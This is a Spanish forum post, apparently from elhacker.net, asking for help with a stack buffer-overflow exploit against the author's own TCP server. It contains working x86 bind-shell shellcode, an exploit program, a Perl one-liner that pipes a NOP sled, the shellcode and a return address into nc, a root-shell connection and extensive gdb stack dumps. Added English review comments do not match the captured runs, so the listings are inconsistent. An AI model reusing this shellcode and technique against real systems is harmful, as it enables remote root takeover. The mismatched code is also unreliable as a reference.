Bueno, puede que el título no sea muy elegante, pero es lo que se me ha ocurrido. Os explico:
Tengo una aplicación (Code 1) que estoy explotando. Ahora, he conseguido explotarla desde un comando en la consola. Y os escribo esto a causa del exploit que estoy haciendo y que no funciona ni grabándolo en un CD y oyéndolo al revés...
La cosa es que la shellcode se me "duplica" modificando el ret...
Os dejo algunos códigos, a ver si me podéis echar una manita...
__________________________________________________________________________________________
Exploit in action [Capt 0.1]
juanra@Juanra:~/Escritorio/Serv$ ./exploit 127.0.0.1 31337
Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net
Creating socket... [OK]
Conecting target... [OK]
Creating buffer... [OK]
Sending buffer... [OK]
Now you can exec NC [nc -vv localhost 5074]
Be good!
juanra@Juanra:~/Escritorio/Serv$
__________________________________________________________________________________________
Serv in action [Capt 0.2]
juanra@Juanra:~/Escritorio/Serv$ sudo gdb -q serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/Escritorio/Serv/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 03/03/2011 20:59:09
03/03/2011 20:59:09 Starting up...
03/03/2011 20:59:11 Got connection from 127.0.0.1:60359
03/03/2011 20:59:11 RECV 427 bytes: ������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�P@��P@P���f̀1�Rfh�CfS��jQP���f̀@�D$CC�f̀��
RRC�f̀��Ѱ?̀A��u�Rhn/shh//bi��RS���
__________________________________________________________________________________________
Serv.c [Code 1]
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
/* Listening socket and the currently accepted client socket.  Both live
 * at file scope so the signal handler can close them; as uninitialised
 * globals they start out as 0 (static storage duration). */
int sockfd;
int newsock;
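void shutup (int signal)
{
    /* Handler installed by main() for SIGTERM and SIGINT.  POSIX allows
     * only async-signal-safe calls inside a handler: the original called
     * times() (strftime/printf) and printf(), which are not, so the
     * message is now emitted with write() and the timestamp is omitted.
     * The parameter keeps its original name even though it shadows the
     * signal() function inside this body. */
    static const char msg[] = "Shutting down...\n\n";
    (void) signal;
    (void) write (STDOUT_FILENO, msg, sizeof msg - 1);
    close (newsock);
    close (sockfd);
    /* Invalidate the globals so a later accept()/recv() on them fails
     * with EBADF instead of touching a recycled descriptor number. */
    newsock = -1;
    sockfd = -1;
}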
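int times (void)
{
    /* Print the current local time as "dd/mm/yyyy HH:MM:SS " so that the
     * caller's message follows it on the same line (the server capture
     * above shows each log line prefixed this way).  Returns 0 on
     * success, -1 when the time cannot be obtained or formatted.
     * NOTE(review): the name clashes with POSIX times(2) should
     * <sys/times.h> ever be included. */
    time_t now = time (NULL);
    struct tm *ahora = (now == (time_t) -1) ? NULL : localtime (&now);
    if (ahora == NULL) {
        return -1;
    }
    char buffer [40];
    /* The original passed an uninitialised struct tm* to strftime()
     * (undefined behaviour); the pointer now comes from localtime(). */
    if (strftime (buffer, sizeof buffer, "%d/%m/%Y %H:%M:%S", ahora) == 0) {
        return -1;
    }
    printf ("%s ", buffer);
    return 0;
}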
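int handle_connect (char *buffer)
{
    /* Per-chunk hook called from main()'s receive loop with the bytes
     * just received.  As listed it only logs a timestamp.  The original
     * declared a 256-byte local `buff` it never wrote and fell off the
     * end of an int-returning function (UB if the value were read);
     * this version drops the unused local and returns 0.
     *
     * NOTE(review): `buffer` is main()'s 1024-byte receive buffer and
     * recv() does not NUL-terminate it.  The 427-byte RECV and the gdb
     * dump captured above suggest the real handler copies it into a
     * fixed-size local; any such copy must be bounded by the local's
     * size (e.g. snprintf(buff, sizeof buff, "%s", buffer) after the
     * caller has terminated buffer), never strcpy()/strcat(). */
    (void) buffer;
    times ();
    return 0;
}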
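int main (int argc, char *argv [])
{
    /* Single-threaded TCP server: prints a banner, binds the port from
     * argv[1] on all interfaces, and for each client logs the peer and
     * hands every received chunk to handle_connect() until the client
     * sends at most one byte, closes, or an error occurs.  Returns 0 on
     * clean exit, 1 on a usage/privilege error or a fatal socket error. */
    char hora [40] = "";
    time_t now = time (NULL);
    struct tm *ahora = (now == (time_t) -1) ? NULL : localtime (&now);
    /* The original passed an uninitialised struct tm* to strftime() (UB). */
    if (ahora == NULL
        || strftime (hora, sizeof hora, "%d/%m/%Y %H:%M:%S", ahora) == 0) {
        hora [0] = '\0';
    }
    printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora);

    /* Kept for compatibility with the original.  Nothing in this listing
     * needs root (an unprivileged port binds fine), and running as root
     * only raises the impact of any bug in the receive path -- consider
     * removing this requirement or dropping privileges after bind(). */
    if (getuid () != 0) {
        printf ("This proccess must be run by root.\n\n");
        return 1;
    }
    if (argc < 2) {
        printf ("Use: %s <PORT>\n\n", argv [0]);
        return 1;
    }

    /* Parse the port strictly instead of atoi(): reject junk and out-of-range. */
    errno = 0;
    char *end = NULL;
    long port = strtol (argv [1], &end, 10);
    if (end == argv [1] || *end != '\0' || errno == ERANGE
        || port < 1 || port > 65535) {
        printf ("Invalid port: %s\n\n", argv [1]);
        return 1;
    }

    sockfd = socket (AF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror ("socket");
        return 1;
    }
    /* Designated initialiser zeroes sin_zero; the original left the
     * struct partly indeterminate. */
    struct sockaddr_in host = {
        .sin_family = AF_INET,
        .sin_port = htons ((unsigned short) port),
        .sin_addr.s_addr = htonl (INADDR_ANY),
    };
    if (bind (sockfd, (struct sockaddr *) &host, sizeof host) == -1) {
        perror ("bind");
        close (sockfd);
        return 1;
    }
    if (listen (sockfd, 3) == -1) {
        perror ("listen");
        close (sockfd);
        return 1;
    }
    times ();
    printf ("Starting up...\n\n");
    signal (SIGTERM, shutup);
    signal (SIGINT, shutup);

    char buffer [1024];
    while (1) {
        struct sockaddr_in client;
        socklen_t size = sizeof client;   /* accept() wants socklen_t, not int */
        newsock = accept (sockfd, (struct sockaddr *) &client, &size);
        if (newsock == -1) {
            if (errno == EINTR) {
                continue;
            }
            /* EBADF here means shutup() already closed the listener;
             * the original looped forever on the dead descriptor. */
            perror ("accept");
            break;
        }
        times ();
        printf ("Got connection from %s:%d\n",
                inet_ntoa (client.sin_addr), ntohs (client.sin_port));

        /* Read one byte less than the buffer so each chunk can be
         * NUL-terminated before handle_connect() sees it; recv() never
         * terminates data itself.  The original passed &buffer (a
         * char (*)[1024]) and the full size, leaving no room for '\0'. */
        ssize_t cont = recv (newsock, buffer, sizeof buffer - 1, 0);
        while (cont > 1) {
            buffer [cont] = '\0';
            handle_connect (buffer);
            cont = recv (newsock, buffer, sizeof buffer - 1, 0);
        }
        times ();
        printf ("Finishing connection from %s:%d\n\n",
                inet_ntoa (client.sin_addr), ntohs (client.sin_port));
        close (newsock);
        newsock = -1;
    }
    close (sockfd);
    return 0;
}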
__________________________________________________________________________________________
Exploit.c [Code 2]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
int main (int argc, char *argv [])
{
/* Connects to <target_ip>:<port> (argv[1], argv[2]) and sends the
 * contents of `command`.  Exit status: 1 on usage, socket, connect or
 * send failure, 0 otherwise.  NOTE(review): the captured run above
 * prints "[OK]" markers that do not appear anywhere in this listing,
 * and nothing below ever writes `nops` or `command`, so the forum
 * rendering appears to have dropped lines; the notes describe the code
 * as shown. */
printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n"); if (argc != 3)
{
printf ("!!! Use: %s <target_ip> <port>\n\n", argv
[0]); return 1;
}
/* `host` is not zeroed (no memset or initialiser), so sin_zero holds
 * indeterminate bytes; harmless for connect() but worth initialising. */
printf ("Creating socket...\t"); struct sockaddr_in host; int sockfd;
host.sin_family = AF_INET;
host.
sin_port = htons
(atoi (argv
[2])); host.sin_addr.s_addr = inet_addr (argv [1]);
/* Magic numbers: 2/1 are presumably AF_INET/SOCK_STREAM (Linux values);
 * the named constants are portable and self-documenting.  atoi() above
 * and inet_addr() here give no error indication for malformed input. */
if ((sockfd=socket (2, 1, 0))==-1)
{
return 1;
}
/* The socket is never close()d on any path (leaks until process exit). */
printf ("Conecting target...\t"); if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
{
return 1;
}
/* As listed, `nops`, `shellcode` and `ret` are declared but never used
 * and `nops` is never initialised.  `shellcode` is a raw machine-code
 * byte string (not analysed here); `ret` is a placeholder return
 * address -- the 0x41414141 words in the gdb dump above match "AAAA". */
printf ("Creating buffer...\t"); char nops [168];
char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52"
"\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43"
"\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
"\xcd\x80";
char ret [6] = "AAAA\x90";
/* `command` is declared but never written in this listing. */
char command [265];
/* strlen() on a never-written array reads indeterminate bytes --
 * undefined behaviour in C -- and send() then transmits whatever the
 * stack happened to hold.  `&command` has type char (*)[265]; the
 * address is the same, but `command` is the correct type to pass.
 * A short send() (fewer bytes than requested) is not detected. */
printf ("Sending buffer...\t"); if (send
(sockfd
, &command
, strlen (command
), 0)==-1) {
return 1;
}
/* The port 5074 mentioned here is hard-coded in the message only. */
printf ("Now you can exec NC [nc -vv localhost 5074]\nBe good!\n\n"); return 0;
}
__________________________________________________________________________________________
Exploit Perl [Capt 1]juanra@Juanra:~/Escritorio/Serv$ perl -e 'print "\x90"x168 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x50\f8\xff\xbf" . "\x90"' | nc -vv localhost 31337
+++++++++++++++++++++++++++++++++++++++++++
juanra@Juanra:~/Escritorio/Serv$ nc -vv localhost 5074 [Conectarme como root :P]
__________________________________________________________________________________________
GDB look at ESP [Capt 2]
(gdb) x/5000x $esp
0xbffff800: 0x4050c389 0xb0e18950 0x3180cd66 0x686652d2
0xbffff810: 0x6643d213 0x6ae18953 0x89505110 0xcd66b0e1
0xbffff820: 0x44894080 0x43430424 0x80cd66b0 0x520cc483
0xbffff830: 0x66b04352 0x899380cd 0xcd3fb0d1 0xf9804180
0xbffff840: 0x52f67503 0x732f6e68 0x2f2f6868 0xe3896962
0xbffff850: 0xe1895352 0x80cd0bb0 0x41414141 0xb7ff6e90
0xbffff860: 0xb7fed1f8 0xb7fff2a0 0xbffffa0c 0xb7ff1413
0xbffff870: 0xb7e80428 0xb7fe25a2 0xb7ff7990 0xb7ff79b0
0xbffff880: 0xb7ffb028 0xb7ffbb31 0xb7ffbb31 0xb7ff7990
0xbffff890: 0xb7ff79b0 0xb7ffb028 0xb7ffbb31 0xb7fff2a0
0xbffff8a0: 0x00ffeff4 0x90909000 0x90909090 0x90909090
0xbffff8b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d0: 0x90909090 0x4050c031 0x4050c389 0xb0e18950
0xbffff8e0: 0x3180cd66 0x686652d2 0x6643d213 0x6ae18953
0xbffff8f0: 0x89505110 0xcd66b0e1 0x44894080 0x43430424
0xbffff900: 0x80cd66b0 0x520cc483 0x66b04352 0x899380cd
0xbffff910: 0xcd3fb0d1 0xf9804180 0x52f67503 0x732f6e68
0xbffff920: 0x2f2f6868 0xe3896962 0xe1895352 0x80cd0bb0
0xbffff930: 0x4050c031 0x4050c389 0xb0e18950 0x3180cd66
0xbffff940: 0x686652d2 0x6643d213 0x6ae18953 0x89505110
0xbffff950: 0xcd66b0e1 0x44894080 0x43430424 0x80cd66b0
0xbffff960: 0x520cc483 0x66b04352 0x899380cd 0xcd3fb0d1
---Type <return> to continue, or q <return> to quit---
0xbffff970: 0xf9804180 0x52f67503 0x732f6e68 0x2f2f6868
0xbffff980: 0xe3896962 0xe1895352 0x80cd0bb0 0x41414141
0xbffff990: 0xb7ff6e90 0xb7fed1f8 0xb7fff2a0 0xbffffa0c
0xbffff9a0: 0xb7ff1413 0xb7e80428 0xb7fe25a2 0xb7ff7990
0xbffff9b0: 0xb7ff79b0 0xb7ffb028 0xb7ffbb31 0xb7ffbb31
0xbffff9c0: 0xb7ff7990 0xb7ff79b0 0xb7ffb028 0xb7ffbb31
0xbffff9d0: 0xb7fff2a0 0xb7ffeff4 0xb7fe2000 0x00000007
0xbffff9e0: 0xb7fe2450 0x00000000 0x00000008 0x00000070
0xbffff9f0: 0xb7edf620 0x00000001 0xb7fe0d60 0x0804a054
0xbffffa00: 0xb7ffeff4 0x0000000c 0x00000007 0xbffffa94
0xbffffa10: 0xb7ff19ae 0x00000007 0x00000010 0x00000001
0xbffffa20: 0xb7fe25ce 0x00000000 0xb7fe2778 0xb7fe22f0
0xbffffa30: 0xb7fe0d40 0xb7fff014 0x00000002 0xb7fff2a0
0xbffffa40: 0xb7ff6e01 0x00000000 0xb7fe2290 0xb7fe2450
0xbffffa50: 0x00000000 0xb7ffef98 0x00000006 0xb7fe25ce
0xbffffa60: 0xb7fe2290 0x00000000 0x00000000 0xb7ff6f35
0xbffffa70: 0x00000008 0x00000088 0xb7ffeff4 0xbffffa94
0xbffffa80: 0xb7ff701e 0x00000088 0xbffffacc 0xbffffae8
0xbffffa90: 0x00000000 0xbffffabc 0xb7ff3209 0x00000011
0xbffffaa0: 0x00000008 0xb7e6d6c0 0x00000038 0x00000001
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x00000208 0xb7fe26d0 0x000000a8
0xbffffad0: 0x00000000 0x00000000 0x00000000 0xb7fe0dcc
---Type <return> to continue, or q <return> to quit---
0xbffffae0: 0xb7fea3b2 0xb7fd1000 0x0000df31 0xb7ffeff4
0xbffffaf0: 0xbffffcb0 0xb7fe536d 0xb7e7a400 0x0d696910
0xbffffb00: 0xbffffb38 0xb7feabe8 0xb7e8041e 0x0804848d
0xbffffb10: 0x00000000 0xb7fff948 0xb7fe0b40 0xbfff0002
0xbffffb20: 0xb7ff0ca8 0x080483dc 0xb7fff954 0xb7ffeff4
0xbffffb30: 0xb7fe0b14 0x00000001 0xbffffbb4 0xb7feafdd
0xbffffb40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb50: 0x00000000 0xb7ffae88 0xbffffb80 0x00000000
0xbffffb60: 0xf63d4e2e 0xb7fe0858 0x07b1ea71 0x00000003
0xbffffb70: 0xb7e71d10 0xb7e71b08 0x00000000 0x00000000
0xbffffb80: 0x00000000 0x00000000 0x00000001 0x0000086f
0xbffffb90: 0xb7fe0b40 0xb7fe0858 0x08048475 0xb7e7ac20
0xbffffba0: 0x080482ac 0x00000001 0xb7ffeff4 0xf63d4e2e
0xbffffbb0: 0xb7fff828 0xbffffca0 0xb7feb1ef 0xbffffc90
0xbffffbc0: 0x080482ac 0xbffffc84 0xb7fff7cc 0x00000000
0xbffffbd0: 0xb7fe0b40 0x00000001 0x00000000 0x00000001
0xbffffbe0: 0xb7fff658 0x00000000 0x00010000 0x00000000
0xbffffbf0: 0xb7fe1168 0x00000000 0xbffffc90 0xbffffc84
0xbffffc00: 0x00000000 0x00000000 0x00000000 0xbffffcd0
0xbffffc10: 0xb7fff670 0x08048475 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0xb7fe3000 0x697a0002
0xbffffc30: 0x00000000 0x00000000 0x00000000 0xb2b70002
0xbffffc40: 0x0100007f 0x00000000 0x00000000 0x302f3330
---Type <return> to continue, or q <return> to quit---
0xbffffc50: 0x30322f33 0x32203131 0x31333a30 0x0030333a
0xbffffc60: 0xb7f8f329 0x08049ff4 0xbffffc78 0x080485d0
0xbffffc70: 0xb7fccff4 0x4d6fec92 0xb7fd0360 0x00000165
0xbffffc80: 0xbffffca0 0xb7fccff4 0xbffffcf8 0xb7e84775
0xbffffc90: 0x08048bd0 0x08048750 0xbffffcf8 0xb7e84775
0xbffffca0: 0x00000002 0xbffffd24 0xbffffd30 0xb7fe0b40
0xbffffcb0: 0x00000001 0x00000001 0x00000000 0x08048475
0xbffffcc0: 0xb7fccff4 0x08048bd0 0x08048750 0xbffffcf8
0xbffffcd0: 0xb5bf4009 0x9ac87419 0x00000000 0x00000000
0xbffffce0: 0x00000000 0xb7ff57f0 0xb7e8469d 0xb7ffeff4
0xbffffcf0: 0x00000002 0x08048750 0x00000000 0x08048771
0xbffffd00: 0x08048908 0x00000002 0xbffffd24 0x08048bd0
0xbffffd10: 0x08048bc0 0xb7ff07b0 0xbffffd1c 0xb7ffbd83
0xbffffd20: 0x00000002 0xbffffe28 0xbffffe4a 0x00000000
0xbffffd30: 0xbffffe50 0xbffffe60 0xbffffe6b 0xbffffe75
0xbffffd40: 0xbffffe86 0xbffffe94 0xbffffea2 0xbffffead
0xbffffd50: 0xbffffefe 0xbfffff1f 0xbfffff30 0xbfffff39
0xbffffd60: 0xbfffff41 0xbfffff63 0xbfffff75 0xbfffff82
0xbffffd70: 0xbfffff90 0xbfffff9d 0xbfffffb6 0x00000000
0xbffffd80: 0x00000020 0xb7fe1420 0x00000021 0xb7fe1000
0xbffffd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbffffda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbffffdb0: 0x00000004 0x00000020 0x00000005 0x00000008
---Type <return> to continue, or q <return> to quit---
0xbffffdc0: 0x00000007 0xb7fe2000 0x00000008 0x00000000
0xbffffdd0: 0x00000009 0x08048750 0x0000000b 0x00000000
0xbffffde0: 0x0000000c 0x00000000 0x0000000d 0x00000000
0xbffffdf0: 0x0000000e 0x00000000 0x00000017 0x00000000
0xbffffe00: 0x0000001f 0xbfffffda 0x0000000f 0xbffffe1b
0xbffffe10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffe20: 0x00000000 0x00000000 0x6d6f682f 0x756a2f65
0xbffffe30: 0x61726e61 0x6373452f 0x6f746972 0x2f6f6972
0xbffffe40: 0x76726553 0x7265732f 0x31330076 0x00373333
0xbffffe50: 0x4c454853 0x622f3d4c 0x622f6e69 0x00687361
0xbffffe60: 0x4d524554 0x6574783d 0x55006d72 0x3d524553
0xbffffe70: 0x746f6f72 0x44555300 0x53555f4f 0x6a3d5245
0xbffffe80: 0x726e6175 0x55530061 0x555f4f44 0x313d4449
0xbffffe90: 0x00303030 0x52455355 0x454d414e 0x6f6f723d
0xbffffea0: 0x4f430074 0x4e4d554c 0x30383d53 0x54415000
0xbffffeb0: 0x752f3d48 0x6c2f7273 0x6c61636f 0x6962732f
0xbffffec0: 0x752f3a6e 0x6c2f7273 0x6c61636f 0x6e69622f
0xbffffed0: 0x73752f3a 0x62732f72 0x2f3a6e69 0x2f727375
0xbffffee0: 0x3a6e6962 0x6962732f 0x622f3a6e 0x2f3a6e69
0xbffffef0: 0x2f727375 0x52313158 0x69622f36 0x5750006e
0xbfffff00: 0x682f3d44 0x2f656d6f 0x6e61756a 0x452f6172
0xbfffff10: 0x69726373 0x69726f74 0x65532f6f 0x4c007672
0xbfffff20: 0x3d474e41 0x455f7365 0x54552e53 0x00382d46
---Type <return> to continue, or q <return> to quit---
0xbfffff30: 0x454e494c 0x34323d53 0x4c485300 0x303d4c56
0xbfffff40: 0x44555300 0x4f435f4f 0x4e414d4d 0x752f3d44
0xbfffff50: 0x622f7273 0x672f6e69 0x2d206264 0x65732071
0xbfffff60: 0x48007672 0x3d454d4f 0x6d6f682f 0x756a2f65
0xbfffff70: 0x61726e61 0x474f4c00 0x454d414e 0x6f6f723d
0xbfffff80: 0x55530074 0x475f4f44 0x313d4449 0x00303030
0xbfffff90: 0x50534944 0x3d59414c 0x302e303a 0x4c4f4300
0xbfffffa0: 0x4554524f 0x673d4d52 0x656d6f6e 0x7265742d
0xbfffffb0: 0x616e696d 0x4158006c 0x4f485455 0x59544952
0xbfffffc0: 0x6f682f3d 0x6a2f656d 0x726e6175 0x582e2f61
0xbfffffd0: 0x68747561 0x7469726f 0x682f0079 0x2f656d6f
0xbfffffe0: 0x6e61756a 0x452f6172 0x69726373 0x69726f74
0xbffffff0: 0x65532f6f 0x732f7672 0x00767265 0x00000000
Un saludo a todos y muchas gracias...